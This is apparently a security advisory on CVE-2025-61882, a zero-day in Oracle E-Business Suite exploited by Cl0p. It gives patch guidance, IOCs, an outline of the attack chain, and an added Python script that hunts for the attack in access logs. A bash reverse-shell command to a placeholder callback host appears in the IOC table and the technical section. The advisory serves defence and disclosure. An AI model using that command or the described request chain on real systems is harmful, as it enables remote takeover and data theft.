Executive Summary

    On October 4th, Oracle reported a critical zero-day vulnerability in Oracle E-Business Suite (EBS) that is under active exploitation by Cl0p ransomware operators. The vulnerability (tracked as CVE-2025-61882) is a critical unauthenticated remote code execution software vulnerability affecting Oracle EBS versions 12.2.3 through 12.2.14, with a CVSS score of 9.8.

    The flaw exists in the Oracle Concurrent Processing BI Publisher Integration component of Oracle EBS and if successfully exploited grants unauthenticated attackers remote code execution (RCE) on a target machine without requiring any credentials.

    Beazley Security strongly recommends organizations apply available patches for affected Oracle EBS systems and to immediately assess them for potential compromise, given reports of active exploitation by the Cl0p ransomware operators. Indicators of Compromise (IOCs) provided in this advisory can assist in identifying systems that may have been impacted.

    Additionally, the public leak of functional exploit code by Scattered Lapsus$ increases accessibility and likelihood other threat actors will begin using the exploit.

    Affected Systems or Products

    Oracle has released a security alert stating that the following Oracle E-Business Suite versions are impacted by this vulnerability. Please see the Patches section of this document for more details.

    Product                 | Affected       | Unaffected
    Oracle E-Business Suite | 12.2.3-12.2.14 | Later than 12.2.14

    Mitigations / Workarounds

    Given the active exploitation by Cl0p ransomware operators and the public leak of exploit code by a well-known collective of threat actors, Beazley Security strongly recommends organizations apply these updates immediately. Oracle has released emergency patches to remediate this vulnerability; please see the “Patches” section below for more information.

    If patching cannot be immediately applied, other mitigations may temporarily reduce the risk of exposure:

    • Restrict public network access to, or consider temporary isolation of, Oracle EBS systems, especially those using BI Publisher Integration modules, due to the severity of this issue.

    • Deploy Web Application Firewalls (WAF) with signatures that detect exploitation attempts of this vulnerability.

    • Monitor for indicators of attack or compromise. See the “Indicators of Compromise” section in this document for more information.

    Please note that threat actors claim to have more sophisticated versions of this exploit that require less outbound connectivity from impacted systems. Organizations are strongly advised to apply available patches rather than attempt any temporary mitigations that may not fully address the issue.

    Patches

    Patches are available through Oracle’s Patch Availability Document (requires Oracle login) which provides step-by-step installation instructions tailored to each supported version.

    Before applying the patch for CVE-2025-61882, organizations must first ensure that the October 2023 Critical Patch Update (CPU) is installed. The earlier update is a mandatory prerequisite to apply fixes, according to Oracle’s security advisory.

    Indicators of Compromise

    The table below lists verified Indicators of Compromise tied to active exploitation attempts against Oracle EBS, released by Oracle. They include IP addresses and a command pattern that is consistent with reverse shell behavior as seen in the leaked proof of concept exploit.

    Indicator | Type | Description
    200[.]107[.]207[.]26 | IP | Potential GET and POST activity
    185[.]181[.]60[.]11 | IP | Potential GET and POST activity
    sh -c /bin/bash -i >& /dev/tcp/<callback IP>/<callback port> 0>&1 | Command | Establishes an outbound TCP connection (reverse shell style); hardcoded but replaceable RCE payload found in the PoC
    76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
    aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
    6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

    Threat Intelligence

    Cl0p Ransomware Campaign

    The Cl0p ransomware group has been actively exploiting CVE-2025-61882 as a zero-day vulnerability since August 2025, conducting a sophisticated data theft and extortion campaign targeting Oracle EBS clients. It is believed the group has been identifying vulnerable, internet-facing systems and using the now-released exploit to gain access to and exfiltrate data.

    Starting late September and into October, Cl0p started a widespread email extortion campaign, sending ransom demands through compromised, otherwise legitimate email accounts to increase delivery rates to victims according to Cybereason. The extortion emails purportedly direct victims to visit their public facing data leak site with the group claiming to have stolen ERP data including financial records, HR data, and other customer information.

    This campaign mirrors Cl0p’s actions in previous high-profile attacks against the file transfer solution MOVEit Transfer back in 2023, another campaign that exploited a zero-day vulnerability (CVE-2023-34362) in internet-facing enterprise software.

    Technical Details

    CVE-2025-61882 is a critical remote code execution vulnerability that is exploitable without authentication. The flaw exists in Oracle E-Business Suite’s (EBS) Concurrent Processing product, affecting the BI Publisher Integration component according to the risk matrix provided in Oracle’s related advisory.

    This vulnerability is especially dangerous because attackers can exploit it remotely on internet-facing systems without authentication or user involvement.

    At the time of this writing, Oracle has not provided details about the flaws and specific exploitation of this vulnerability. However, according to an article released by Rapid7 the exploit was released to the public by the “SCATTERED LAPSUS$” and/or related threat actors, and analysis performed by researcher Johannes Ullrich suggests exploitation may be attributed to a Server-Side Request Forgery (SSRF) issue, following a multi-step process:

    • The exploit script sends an HTTP GET request to /OA_HTML/runforms.jsp to fingerprint the target system and verify the hostname.

    • An HTTP POST request to /OA_HTML/JavaScriptServlet retrieves a CSRF token required for the final exploit.

    • The exploit request is contained in an HTTP POST to /OA_HTML/configurator/UiServlet.

    • The exploit payload leverages a CRLF injection and an authentication bypass to deliver the SSRF payload.

    • The SSRF payload tricks the target machine into retrieving and executing arbitrary commands from an attacker-controlled server (labelled “evil_server” in the leaked PoC code).

    • The “evil_server” code in the leaked PoC contains the bash -i >& /dev/tcp/<IP>/<port> 0>&1 reverse shell, but this command can be replaced by anything.
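    One way to hunt for this request sequence, and for the Oracle-published IOC addresses from the Indicators of Compromise section, in web-tier access logs. This is an added example, not Beazley Security's or Oracle's code; it assumes combined-format access logs from the web server in front of EBS and runs over constructed sample lines, and since a legitimate Configurator session can also produce the full sequence, findings are for analyst triage rather than automatic blocking.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# IOC addresses published by Oracle (defanged in the advisory table, plain here).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
# Request sequence of the leaked PoC, in the order the advisory describes it.
CHAIN = [("GET", "/OA_HTML/runforms.jsp"),
         ("POST", "/OA_HTML/JavaScriptServlet"),
         ("POST", "/OA_HTML/configurator/UiServlet")]
# Assumes Apache/Oracle HTTP Server combined-format access log lines.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"')

def parse_line(line):
    # Returns (ip, timestamp, method, path without query string) or None.
    m = LOG_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def hunt(lines, window=timedelta(minutes=10)):
    """Return (severity, source_ip, reason) findings for analyst triage."""
    findings = []
    progress = defaultdict(lambda: (0, None))  # ip -> (next chain step, chain start)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if ip in IOC_IPS:
            findings.append(("high", ip, f"known IOC address requested {path}"))
        step, start = progress[ip]
        if start is not None and ts - start > window:
            step, start = 0, None  # chain window expired, start over
        if (method, path) == CHAIN[step]:
            step, start = step + 1, start or ts
            if step == len(CHAIN):  # fingerprint -> CSRF token -> UiServlet, in order
                findings.append(("high", ip, "complete PoC request chain"))
                step, start = 0, None
        elif (method, path) == CHAIN[-1]:  # UiServlet POST without the lead-up
            findings.append(("medium", ip, "UiServlet POST outside expected sequence"))
        progress[ip] = (step, start)
    return findings

# Constructed sample (not real traffic): a full chain, a stray UiServlet POST, an IOC address.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Oct/2025:10:00:01 +0000] "GET /OA_HTML/runforms.jsp HTTP/1.1" 200 512
203.0.113.10 - - [05/Oct/2025:10:00:03 +0000] "POST /OA_HTML/JavaScriptServlet HTTP/1.1" 200 88
203.0.113.10 - - [05/Oct/2025:10:00:05 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 0
198.51.100.7 - - [05/Oct/2025:10:01:00 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 0
200.107.207.26 - - [05/Oct/2025:10:02:00 +0000] "GET /OA_HTML/runforms.jsp HTTP/1.1" 200 512
""".splitlines()
```

    Running hunt(SAMPLE_LOG) yields one high finding for the complete chain, one medium finding for the stray UiServlet POST, and one high finding for the IOC address.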

    Beazley Security Labs has acquired and is presently analyzing the Proof of Concept (PoC) exploit. If confirmed, its findings, which are consistent with the testing and reporting by Johannes Ullrich, suggest that the probable attack vector for CVE-2025-61882 is as outlined below:

    Figure 1: CVE-2025-61882 attack chain (figure not reproduced here)

    How Beazley Security is responding

    Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.

    We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

    If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.